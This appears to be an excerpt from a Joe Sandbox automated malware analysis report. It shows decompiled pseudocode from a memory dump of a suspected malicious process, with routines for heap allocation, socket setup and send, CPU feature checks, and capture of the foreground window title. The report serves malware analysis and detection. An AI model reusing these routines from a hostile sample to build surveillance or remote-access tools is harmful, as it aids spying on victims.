								_t4 = RtlReAllocateHeap( *0x470a5c, 0, _t13, _t15); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00443E46();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00441850(_t10, _t15, __eflags, _t15);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E0043EEAD())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00445002(_t13);
					goto L6;
				}
				return E00444A38(__ecx, _a8);
			}








                    0x00444a86
                    0x00444a8c
                    0x00444a91
                    0x00444a9f
                    0x00444aa2
                    0x00444aa4
                    0x00444aaf
                    0x00444ab2
                    0x00444ad9
                    0x00444ae3
                    0x00444ae9
                    0x00444aeb
                    0x00000000
                    0x00000000
                    0x00444aca
                    0x00444acc
                    0x00000000
                    0x00000000
                    0x00444acf
                    0x00444ad4
                    0x00444ad5
                    0x00444ad7
                    0x00000000
                    0x00000000
                    0x00444ad7
                    0x00444ac1
                    0x00000000
                    0x00444ac1
                    0x00444ab4
                    0x00444ab9
                    0x00444abf
                    0x00444abf
                    0x00444abf
                    0x00000000
                    0x00444abf
                    0x00444aa7
                    0x00000000
                    0x00444aac
                    0x00000000

                    APIs
                    • _free.LIBCMT ref: 00444AA7
                      • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,0043180D,00000000,0000000F,0042E217,?,?,004302BE,?,?,00000000), ref: 00444AE3
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap$_free
                    • String ID:
                    • API String ID: 1482568997-0
                    • Opcode ID: 36f31b41252dabdd3ccd32d7c95e91fca07e2e5538f8792d367621ddf272ea40
                    • Instruction ID: 455c427813147b6f3d2efebb8123bf363e795c38cc092496033f2fe0a3bdb231
                    • Opcode Fuzzy Hash: 36f31b41252dabdd3ccd32d7c95e91fca07e2e5538f8792d367621ddf272ea40
                    • Instruction Fuzzy Hash: 76F0F632281215AAFB216A66AC01F6B379D9FC1B74F24412FF914B62D1DF2CCC0041AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041B45A Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041B45A(void* __ecx, long __edx) {
				char _v8;
				char _v32;
				void* __ebp;
				long _t10;
				void* _t18;
				void* _t27;
				void* _t29;

				_t26 = __edx;
				_t27 = __ecx;
				E004020BF(_t18,  &_v32);
				_t10 = FormatMessageA(0x1100, 0, __edx, 0x400,  &_v8, 0, 0); // executed
				if(_t10 != 0) {
					L00405A86(_t18,  &_v32, _t26, _v8);
					LocalFree(_v8);
					E00402035(_t18, _t27, _t29, __eflags,  &_v32);
				} else {
					E00402073(_t18, _t27, _t26, _t29, 0x464074);
				}
				E00401FB8();
				return _t27;
			}










                    0x0041b45a
                    0x0041b462
                    0x0041b469
                    0x0041b482
                    0x0041b48a
                    0x0041b4a0
                    0x0041b4a8
                    0x0041b4b4
                    0x0041b48c
                    0x0041b493
                    0x0041b493
                    0x0041b4bc
                    0x0041b4c8

                    APIs
                    • FormatMessageA.KERNELBASE(00001100,00000000,00000000,00000400,?,00000000,00000000,00472EE0,00472EE0), ref: 0041B482
                    • LocalFree.KERNEL32(?,?), ref: 0041B4A8
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FormatFreeLocalMessage
                    • String ID:
                    • API String ID: 1427518018-0
                    • Opcode ID: 1328b3594f48dd1c6b2aaf156e976a7ae102f3e449e780a0b7836d532136a00d
                    • Instruction ID: 6c993a8d8ec4289f23bd16f4b377e4c193b758fe99a849caa093818841c15766
                    • Opcode Fuzzy Hash: 1328b3594f48dd1c6b2aaf156e976a7ae102f3e449e780a0b7836d532136a00d
                    • Instruction Fuzzy Hash: 15F0A434B00209AADF18A766DD4ADFF762CDB84345B10417FB606B22D1EAB85E05C659
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040480D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E0040480D(char* __ecx) {
				intOrPtr _t14;
				char _t16;
				char* _t22;

				_t22 = __ecx;
				if( *0x470abb != 0 || E0040487E() != 0) {
					_t14 =  *0x470adc; // 0xedf140
					__imp__#23( *((intOrPtr*)(_t14 + 4)), 1, 6); // executed
					 *((intOrPtr*)(_t22 + 4)) = _t14;
					if(_t14 == 0xffffffff) {
						goto L2;
					} else {
						_t16 =  *0x470ae4; // 0x1
						 *((char*)(_t22 + 0x5c)) = 0;
						 *((intOrPtr*)(_t22 + 0x60)) = 0;
						 *((intOrPtr*)(_t22 + 0x58)) = 0x3e8;
						 *((char*)(_t22 + 0x7d)) = 0;
						 *((char*)(_t22 + 1)) = _t16;
						 *((intOrPtr*)(_t22 + 0x4c)) = 0;
						 *((intOrPtr*)(_t22 + 0x50)) = 0;
						 *((intOrPtr*)(_t22 + 0x68)) = 0;
						 *((intOrPtr*)(_t22 + 0x70)) = 0;
						 *((intOrPtr*)(_t22 + 0x6c)) = 0;
						 *((intOrPtr*)(_t22 + 0x68)) = CreateEventW(0, 0, 1, 0);
						 *_t22 = 1;
						return 1;
					}
				} else {
					L2:
					return 0;
				}
			}






                    0x00404815
                    0x00404817
                    0x00404826
                    0x00404832
                    0x00404838
                    0x0040483e
                    0x00000000
                    0x00404840
                    0x00404840
                    0x0040484c
                    0x0040484f
                    0x00404852
                    0x00404859
                    0x0040485c
                    0x0040485f
                    0x00404862
                    0x00404865
                    0x00404868
                    0x0040486b
                    0x00404874
                    0x00404879
                    0x0040487d
                    0x0040487d
                    0x00404822
                    0x00404822
                    0x00404825
                    0x00404825

                    APIs
                    • socket.WS2_32(?,00000001,00000006), ref: 00404832
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052EB,?,?,00000000,00000000,?,?,00000000,004051E8,?,00000000), ref: 0040486E
                      • Part of subcall function 0040487E: WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEventStartupsocket
                    • String ID:
                    • API String ID: 1953588214-0
                    • Opcode ID: ffe2297606e416d6c3b5ccad3e5f88dc31d939aa0b0f85ed0b7fe91bade190d6
                    • Instruction ID: 59a91cd762d8530cb4f753689cd2647fba7b16dd7f4d7e7b9f20fabe365cb730
                    • Opcode Fuzzy Hash: ffe2297606e416d6c3b5ccad3e5f88dc31d939aa0b0f85ed0b7fe91bade190d6
                    • Instruction Fuzzy Hash: 200171B14087809FD7359F39B845697BFE0AB15304F048D6EF1DA97B91D3B1A481CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044205C Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E0044205C(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t15;
				signed int _t16;

				if( *0x4704e0 == 0) {
					_push(_t15);
					E0044D8D9(__ecx); // executed
					_t2 = E0044DBDA(); // executed
					_t19 = _t2;
					if(_t2 != 0) {
						_t3 = E00442109(__ebx, _t19);
						if(_t3 != 0) {
							 *0x4704ec = _t3;
							E00442471(0x4704e0, _t3);
							_t16 = 0;
						} else {
							_t16 = _t15 | 0xffffffff;
						}
						E00445002(0);
					} else {
						_t16 = _t15 | 0xffffffff;
					}
					E00445002(_t19);
					return _t16;
				} else {
					return 0;
				}
			}







                    0x00442063
                    0x00442069
                    0x0044206a
                    0x0044206f
                    0x00442074
                    0x00442078
                    0x00442080
                    0x00442088
                    0x00442095
                    0x0044209a
                    0x0044209f
                    0x0044208a
                    0x0044208a
                    0x0044208a
                    0x004420a3
                    0x0044207a
                    0x0044207a
                    0x0044207a
                    0x004420aa
                    0x004420b4
                    0x00442065
                    0x00442067
                    0x00442067

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 28729854537139cf2ef588ebbf1e600906cd533a01d3acd7e3f75a6007daa64c
                    • Instruction ID: b81e25f7d5918c7bd40ad8093da2d01db50d861b45bde7110f025ab76158fc47
                    • Opcode Fuzzy Hash: 28729854537139cf2ef588ebbf1e600906cd533a01d3acd7e3f75a6007daa64c
                    • Instruction Fuzzy Hash: F7E0A02660282155B631723BBE0AA6F01858BC173DF91422BFA24861C2DFAC4882819D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E0040163E(signed int _a4, signed int _a8, char _a12) {
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* __esi;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				signed int _t76;
				signed int _t87;
				signed int _t90;
				signed int _t91;
				signed int _t92;
				intOrPtr _t93;
				signed int _t94;
				signed int _t96;
				intOrPtr _t97;
				intOrPtr _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed int _t123;
				intOrPtr* _t125;
				signed int _t130;
				signed int _t132;
				signed int _t133;
				void* _t134;
				void* _t140;
				void* _t141;
				void* _t144;
				void* _t145;

				_t108 = _a4;
				if(_t108 != 0) {
					_t65 = _t64 | 0xffffffff;
					_t123 = _t65 % _a8;
					__eflags = _t65 / _a8 - _t108;
					if(_t65 / _a8 >= _t108) {
						_t109 = _t108 * _a8;
						__eflags = _a12;
						if(__eflags == 0) {
							L8:
							_t67 = E00432DF5(_t123, _t134, __eflags, _t109); // executed
							_t111 = _t67;
							goto L9;
						} else {
							__eflags = _t109 - 0x1000;
							if(__eflags < 0) {
								goto L8;
							} else {
								_t69 = _t109 + 0x23;
								__eflags = _t109 + 0x23 - _t109;
								if(__eflags <= 0) {
									goto L3;
								} else {
									_t97 = E00432DF5(_t123, _t134, __eflags, _t69);
									_t11 = _t97 + 0x23; // 0x23
									_t111 = _t11 & 0xffffffe0;
									 *((intOrPtr*)(_t111 - 4)) = _t97;
									L9:
									return _t111;
								}
							}
						}
					} else {
						L3:
						_t140 = _t144;
						_t145 = _t144 - 0xc;
						E004334C8( &_v16);
						E004379F6( &_v16,  &E0046C37C);
						asm("int3");
						_push(_t140);
						_t141 = _t145;
						E004334FB( &_v32);
						E004379F6( &_v32,  &E0046C3B4);
						asm("int3");
						_push(_t141);
						 *0x46fd1c =  *0x46fd1c & 0x00000000;
						 *0x46f010 =  *0x46f010 | 1;
						_t76 = IsProcessorFeaturePresent(0xa);
						__eflags = _t76;
						if(_t76 != 0) {
							_v32 = _v32 & 0x00000000;
							 *0x46f010 =  *0x46f010 | 0x00000002;
							_push(_t134);
							 *0x46fd1c = 1;
							_t125 =  &_v56;
							_push(1);
							asm("cpuid");
							_pop(_t103);
							 *_t125 = 0;
							 *((intOrPtr*)(_t125 + 4)) = 1;
							 *((intOrPtr*)(_t125 + 8)) = 0;
							 *(_t125 + 0xc) = _t123;
							_v24 = _v56;
							_v16 = _v44 ^ 0x49656e69;
							_v20 = _v48 ^ 0x6c65746e;
							_push(1);
							asm("cpuid");
							_t105 =  &_v56;
							__eflags = _v52 ^ 0x756e6547 | _v16 | _v20;
							 *_t105 = 1;
							 *((intOrPtr*)(_t105 + 4)) = _t103;
							 *((intOrPtr*)(_t105 + 8)) = 0;
							 *(_t105 + 0xc) = _t123;
							if((_v52 ^ 0x756e6547 | _v16 | _v20) != 0) {
								L21:
								_t130 =  *0x46fd20; // 0x2
							} else {
								_t96 = _v56 & 0x0fff3ff0;
								__eflags = _t96 - 0x106c0;
								if(_t96 == 0x106c0) {
									L20:
									_t133 =  *0x46fd20; // 0x2
									_t130 = _t133 | 0x00000001;
									 *0x46fd20 = _t130;
								} else {
									__eflags = _t96 - 0x20660;
									if(_t96 == 0x20660) {
										goto L20;
									} else {
										__eflags = _t96 - 0x20670;
										if(_t96 == 0x20670) {
											goto L20;
										} else {
											__eflags = _t96 - 0x30650;
											if(_t96 == 0x30650) {
												goto L20;
											} else {
												__eflags = _t96 - 0x30660;
												if(_t96 == 0x30660) {
													goto L20;
												} else {
													__eflags = _t96 - 0x30670;
													if(_t96 != 0x30670) {
														goto L21;
													} else {
														goto L20;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _v24 - 7;
							_v40 = _v44;
							_t87 = _v48;
							_v16 = _t87;
							_v36 = _t87;
							if(_v24 >= 7) {
								_t93 = 7;
								_push(_t105);
								asm("cpuid");
								_t107 =  &_v56;
								 *_t107 = _t93;
								 *((intOrPtr*)(_t107 + 4)) = _t105;
								 *((intOrPtr*)(_t107 + 8)) = 0;
								 *(_t107 + 0xc) = _t123;
								_t94 = _v52;
								__eflags = _t94 & 0x00000200;
								_v32 = _t94;
								_t87 = _v16;
								if((_t94 & 0x00000200) != 0) {
									_t132 = _t130 | 0x00000002;
									__eflags = _t132;
									 *0x46fd20 = _t132;
								}
							}
							__eflags = _t87 & 0x00100000;
							if((_t87 & 0x00100000) != 0) {
								 *0x46f010 =  *0x46f010 | 0x00000004;
								 *0x46fd1c = 2;
								__eflags = _t87 & 0x08000000;
								if((_t87 & 0x08000000) != 0) {
									__eflags = _t87 & 0x10000000;
									if((_t87 & 0x10000000) != 0) {
										asm("xgetbv");
										_v28 = _t87;
										_v24 = _t123;
										__eflags = (_v28 & 0x00000006) - 6;
										if((_v28 & 0x00000006) == 6) {
											__eflags = 0;
											if(0 == 0) {
												_t90 =  *0x46f010; // 0x2f
												_t91 = _t90 | 0x00000008;
												 *0x46fd1c = 3;
												__eflags = _v32 & 0x00000020;
												 *0x46f010 = _t91;
												if((_v32 & 0x00000020) != 0) {
													_t92 = _t91 | 0x00000020;
													__eflags = _t92;
													 *0x46fd1c = 5;
													 *0x46f010 = _t92;
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}











































                    0x0040163e
                    0x00401644
                    0x00401649
                    0x0040164e
                    0x00401652
                    0x00401654
                    0x0040165b
                    0x00401660
                    0x00401665
                    0x00401688
                    0x00401689
                    0x0040168f
                    0x00000000
                    0x00401667
                    0x00401667
                    0x0040166d
                    0x00000000
                    0x0040166f
                    0x0040166f
                    0x00401672
                    0x00401674
                    0x00000000
                    0x00401676
                    0x00401677
                    0x0040167d
                    0x00401680
                    0x00401683
                    0x00401691
                    0x00401693
                    0x00401693
                    0x00401674
                    0x0040166d
                    0x00401656
                    0x00401656
                    0x00433514
                    0x00433516
                    0x0043351c
                    0x0043352a
                    0x0043352f
                    0x00433530
                    0x00433531
                    0x00433539
                    0x00433547
                    0x0043354c
                    0x0043354d
                    0x00433550
                    0x0043355e
                    0x00433566
                    0x0043356b
                    0x0043356d
                    0x00433573
                    0x00433579
                    0x00433582
                    0x00433584
                    0x0043358a
                    0x0043358d
                    0x0043358e
                    0x00433592
                    0x00433593
                    0x00433595
                    0x00433598
                    0x0043359d
                    0x004335a6
                    0x004335b7
                    0x004335c2
                    0x004335c8
                    0x004335c9
                    0x004335d1
                    0x004335d4
                    0x004335d7
                    0x004335d9
                    0x004335dc
                    0x004335df
                    0x004335e2
                    0x00433627
                    0x00433627
                    0x004335e4
                    0x004335e7
                    0x004335ec
                    0x004335f1
                    0x00433616
                    0x00433616
                    0x0043361c
                    0x0043361f
                    0x004335f3
                    0x004335f3
                    0x004335f8
                    0x00000000
                    0x004335fa
                    0x004335fa
                    0x004335ff
                    0x00000000
                    0x00433601
                    0x00433601
                    0x00433606
                    0x00000000
                    0x00433608
                    0x00433608
                    0x0043360d
                    0x00000000
                    0x0043360f
                    0x0043360f
                    0x00433614
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00433614
                    0x0043360d
                    0x00433606
                    0x004335ff
                    0x004335f8
                    0x004335f1
                    0x0043362d
                    0x00433634
                    0x00433637
                    0x0043363a
                    0x0043363d
                    0x00433640
                    0x00433644
                    0x00433647
                    0x00433648
                    0x0043364d
                    0x00433650
                    0x00433652
                    0x00433655
                    0x00433658
                    0x0043365b
                    0x0043365e
                    0x00433663
                    0x00433666
                    0x00433669
                    0x0043366b
                    0x0043366b
                    0x0043366e
                    0x0043366e
                    0x00433669
                    0x00433676
                    0x0043367b
                    0x0043367d
                    0x00433684
                    0x0043368e
                    0x00433693
                    0x00433695
                    0x0043369a
                    0x0043369e
                    0x004336a1
                    0x004336a4
                    0x004336b2
                    0x004336b5
                    0x004336b7
                    0x004336b9
                    0x004336bb
                    0x004336c0
                    0x004336c3
                    0x004336cd
                    0x004336d1
                    0x004336d6
                    0x004336d8
                    0x004336d8
                    0x004336db
                    0x004336e5
                    0x004336e5
                    0x004336d6
                    0x004336b9
                    0x004336b5
                    0x0043369a
                    0x00433693
                    0x0043367b
                    0x004336ea
                    0x004336f0
                    0x004336f0
                    0x00401646
                    0x00401648
                    0x00401648

                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: caff369a3e44734e3409fc0f357ce8361766cfd02b4466f25ae0342934686fc9
                    • Instruction ID: bcf894cbe7f558628445d92d8d60389314e0f69a1dd629ba4e5ad944aee8928b
                    • Opcode Fuzzy Hash: caff369a3e44734e3409fc0f357ce8361766cfd02b4466f25ae0342934686fc9
                    • Instruction Fuzzy Hash: 73F027B02042016BCB1C9B34CD5062A37969B98356F248F3FF01BD61E0DB3ACC85C60D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A5F1 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041A5F1(void* __ebx, void* __ecx, void* __edi) {
				short _v516;
				void* __ebp;
				struct HWND__* _t6;
				void* _t15;
				void* _t17;
				void* _t18;

				_t17 = __ecx;
				E00435760(__edi,  &_v516, 0, 0x200);
				_t6 = GetForegroundWindow(); // executed
				GetWindowTextW(_t6,  &_v516, 0x100);
				E0040415E(__ebx, _t17, _t15, _t18,  &_v516);
				return _t17;
			}









                    0x0041a609
                    0x0041a60b
                    0x0041a613
                    0x0041a626
                    0x0041a635
                    0x0041a640

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$ForegroundText
                    • String ID:
                    • API String ID: 29597999-0
                    • Opcode ID: cc985dfd2c6f17fb7626ae194c27c182724e299edbceae080d4803d02862944b
                    • Instruction ID: 9b8c2f1ab38f7637c2eaf53de506446bdcdd280578ab757f114b791c05ceb432
                    • Opcode Fuzzy Hash: cc985dfd2c6f17fb7626ae194c27c182724e299edbceae080d4803d02862944b
                    • Instruction Fuzzy Hash: 76E0D871A0032867E720B7A4AC4EFE5776C9704715F0400BABE18D2283EAB49904C7E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044E954 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E0044E954(void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr* _t35;

				_push(_t26);
				_push(_t26);
				_t16 = E004443F4(_t26, 0x40, 0x30); // executed
				_t31 = _t16;
				_v12 = _t31;
				_t28 = _t30;
				if(_t31 != 0) {
					_t2 = _t31 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t31 - _t17;
					if(__eflags != 0) {
						_t3 = _t31 + 0x20; // 0x20
						_t35 = _t3;
						_t33 = _t17;
						do {
							_t4 = _t35 - 0x20; // 0x0
							E00447304(_t28, _t35, __eflags, _t4, 0xfa0, 0);
							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
							 *_t35 = 0;
							_t35 = _t35 + 0x30;
							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
							 *((char*)(_t35 - 0x24)) = 0xa;
							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
							 *((char*)(_t35 - 0x22)) = 0;
							__eflags = _t35 - 0x20 - _t33;
						} while (__eflags != 0);
						_t31 = _v12;
					}
				} else {
					_t31 = 0;
				}
				E00445002(0);
				return _t31;
			}













                    0x0044e959
                    0x0044e95a
                    0x0044e961
                    0x0044e966
                    0x0044e96a
                    0x0044e96e
                    0x0044e971
                    0x0044e977
                    0x0044e977
                    0x0044e97d
                    0x0044e97f
                    0x0044e982
                    0x0044e982
                    0x0044e985
                    0x0044e987
                    0x0044e98d
                    0x0044e991
                    0x0044e996
                    0x0044e99a
                    0x0044e99c
                    0x0044e99f
                    0x0044e9a5
                    0x0044e9ac
                    0x0044e9b0
                    0x0044e9b4
                    0x0044e9b7
                    0x0044e9b7
                    0x0044e9bb
                    0x0044e9be
                    0x0044e973
                    0x0044e973
                    0x0044e973
                    0x0044e9c0
                    0x0044e9cd

                    APIs
                      • Part of subcall function 004443F4: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446B4A,00000001,00000364,?,00000000,00000000,0043A556,00000000,00000000,?,0043A5DA,00000000), ref: 00444435
                    • _free.LIBCMT ref: 0044E9C0
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: e8cc168a206cb2f203358c90cc341d876996d2f60e2126ea3eb12d9ded59db87
                    • Instruction ID: b43b9af27dcddb4849891f15c6ca459ff88ab6a8378577c786593469fbe10df3
                    • Opcode Fuzzy Hash: e8cc168a206cb2f203358c90cc341d876996d2f60e2126ea3eb12d9ded59db87
                    • Instruction Fuzzy Hash: E201D6B22003456BF721CE6AD845D5AFBD9FB85374F25051EE584832C0EA34A906C678
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004443F4 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E004443F4(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x470a5c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00443E46();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0043EEAD())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00441850(_t15, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}










                    0x004443f4
                    0x004443fa
                    0x004443ff
                    0x0044440d
                    0x0044440d
                    0x00444413
                    0x00444415
                    0x00444415
                    0x0044442c
                    0x00444435
                    0x0044443d
                    0x00000000
                    0x00000000
                    0x0044441d
                    0x0044441f
                    0x00444441
                    0x00444446
                    0x0044444c
                    0x00000000
                    0x0044444c
                    0x00444422
                    0x00444427
                    0x00444428
                    0x0044442a
                    0x00000000
                    0x00000000
                    0x0044442a
                    0x00000000
                    0x0044442c
                    0x00444405
                    0x0044440b
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446B4A,00000001,00000364,?,00000000,00000000,0043A556,00000000,00000000,?,0043A5DA,00000000), ref: 00444435
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: fb9104f22dcedbe8120434fadbbdadfd72ec0fc3c5c24ebd2bf5bbd80fe2d0b8
                    • Instruction ID: 9d40b9d846304a4da4b5929be8e6dfedca74db581f7d738e17eab2e9df3cce7a
                    • Opcode Fuzzy Hash: fb9104f22dcedbe8120434fadbbdadfd72ec0fc3c5c24ebd2bf5bbd80fe2d0b8
                    • Instruction Fuzzy Hash: 14F0E931605234A6FB211E629C06B5B7748AFC17B5F148027FC09A7690CA28DC0186ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040487E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: 4b5b1acb0718588404019be5d9f15640a6bb1c21c3ccc0dc3f846b824dafbe4c
                    • Instruction ID: e98c7a7dcee344fb28133bcb2ee241acd4b45dcbdfc1a3ef5d864df1fc63b674
                    • Opcode Fuzzy Hash: 4b5b1acb0718588404019be5d9f15640a6bb1c21c3ccc0dc3f846b824dafbe4c
                    • Instruction Fuzzy Hash: 7ED012325AD7088EE610AAB8AD0F8A47B5CC313A15F0003BA6CB9835D3F640571CC2AB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004255D3 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: a8d70cb1d05a31d846f06bfe6dacdd29f23318bb0f64ab28444019d680c4d177
                    • Instruction ID: bfab3a08044aaf07d4c990dee58e7a6731fa9f306c9d2c0144e000b13adf200d
                    • Opcode Fuzzy Hash: a8d70cb1d05a31d846f06bfe6dacdd29f23318bb0f64ab28444019d680c4d177
                    • Instruction Fuzzy Hash: 56B092B9108302BFCA160B60DC0887A7EA6ABC8385B00882CF146411B0C636C460AB26
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402787 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402787(intOrPtr _a4, intOrPtr _a8) {
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;

				_t4 = E00401694(_t3, _t5, _t6, _a4, _a8, 1); // executed
				return _t4;
			}







                    0x00402e0b
                    0x00402e13

                    APIs
                    • std::_Deallocate.LIBCONCRT ref: 00402E0B
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Deallocatestd::_
                    • String ID:
                    • API String ID: 1323251999-0
                    • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
